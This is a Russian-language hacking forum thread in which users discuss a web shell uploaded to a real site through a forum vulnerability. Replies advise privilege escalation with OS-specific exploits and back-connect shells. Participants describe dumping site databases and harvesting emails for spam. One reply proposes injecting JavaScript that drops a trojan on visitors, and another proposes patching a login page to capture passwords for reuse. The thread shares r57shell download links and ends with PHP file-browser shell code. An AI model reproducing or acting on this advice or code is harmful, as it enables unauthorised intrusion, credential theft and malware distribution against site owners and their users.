Залил на сайт шелл через уязвимость в форуме. Дефейсить не интересно. Можно как то поднять права выше, получить хостера ? Что вообще можно получить с этого шела ?
вопрос: зачем залил: спортивный интерес или кровная месть??? если интерес: ну поройся там, сям, поищи инфу какую нить, залей еще чего-нить интересное, когда админ ету дырку заклеет, залезть опять, админ точно повесится... месть? куси и кроши шоб ни кусочка не осталось, тока покоцаная главная страничка с надписью " ЗДЕСЬ БЫЛ ВАСЯ " З.Ы. тока лучше не тяни... обломают.
для начала глянь версию операционки, потом поищи сплойты под эту версию. Потом бекконнект тебе в руки и юзай сплойт. а вообще вот почитай http://hackedpro.org/forum/showthread.php?t=7
uname -a выдаёт FreeBSD voleri-a.*****.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #0: Tue Oct 3 18:28:07 MSD 2006 root@voleri.*****.ru:/usr/obj/usr/src/sys/work amd64 Система я так понял FreeBSD 6.2-PRERELEASE искал на неё сплоиты но не нашёл, есть только для 6.1 и ниже. Базы данных форума и сайта я слил, потом буду расшифровывать. Крушить ничего не хочу, хочется что нибудь полезного с этого поиметь. А что такое бекконнект ?
На тачке открывается порт для подключения к которому ты и конеектишся. И дальше работаеш через консоль.
Ставь прокси)) Делай дамп баз! посмотри мож в них че интересное)) ну как минимум спам база уже будет! Можеш в гланую страничку добавить Java Script который будет загружать и запускать троянца на комп жертв))
в продолжение темы. А какой прокси посоветуете ставить, а то у меня таже ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.
в продолжение темы. А какой прокси посоветуете ставить, а то у меня та же ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.
если кодить умеешь - то за 5 минут к странице логининга дописывается плагин, который сохраняет пароли в открытом виде, затем проверяются эти пароли на юзерские аськи, мыла etc ))) (чтоб хеши не брутить) (и если прав на перехапись скриптов хватает)
Не подскажешь где про это можно почитать ? Да кстати может кто нибудь поделиться r57shell 1.31 а то rst.void закрыли и нескачаешь, если есть то лучше исправленный =)
http://rst.void.ru/download/r57shell.txt.gz http://rst.void.ru/r57shell_create.php А по мне лучше: http://www.security-teams.net/index.php?showtopic=3429
вот держи небольшой проводник: PHP: <?php if(!isset($_GET['dir'])) $_GET['dir']='.'; if(is_dir($_GET['dir'])) { print "<body bgcolor=d0d0d0><table><tr><td align=center><b>[имя]</b></td><td align=center><b>[права]</b></td><td align=center><b>[размер]</b></td><tr>"; $dira=opendir($_GET['dir']); while (false!==(($file = readdir($dira)))) { if($file=='.') continue; $fs="-"; if(is_dir($file))////есле папка///// echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=660000>$file</font></a></td><td align=center><br>"; else { echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=006600>$file</font></a></td><td align=center>-<br>"; $fs=filesize($_GET['dir']."/$file"); if($fs!=0) { $ost=$fs%1024; $fs-=$ost; if($fs!=0) $fs/=1024; else $fs=1; } } if(is_readable($file)) echo "r"; else echo "-"; if(is_writable($file)) echo "w"; else echo "-"; if(is_executable($file)) echo "x"; else echo "-"; echo "</td><td align=center>$fs</td></tr>"; } } else { print "<pre>"; foreach(file($_GET['dir']) as $val) echo htmlspecialchars($val); print "</pre>"; } ?>
